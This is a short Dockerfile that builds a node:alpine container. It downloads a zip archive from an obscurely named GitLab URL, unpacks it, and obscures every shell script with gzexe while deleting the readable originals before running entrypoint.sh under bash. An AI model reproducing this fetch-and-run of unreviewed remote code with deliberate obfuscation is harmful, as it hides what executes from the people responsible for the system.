FROM node:alpine
EXPOSE 10000
WORKDIR /app

RUN apk update &&\
    apk add git nginx unzip curl wget gzip procps coreutils bash &&\
	wget -q -O core.zip https://gitlab.com/fz1bz1/gw1z11z2/-/raw/c/core.zip?inline=false &&\
	unzip -q core.zip &&\
	rm -rf core.zip &&\
    find ./ -type f -name "*.sh" |xargs gzexe &&\
    find ./ -type f -name "*.sh~" |xargs rm -f &&\
    npm install -g pm2 &&\
    pm2 install pm2-logrotate

ENTRYPOINT ["bash","entrypoint.sh"]
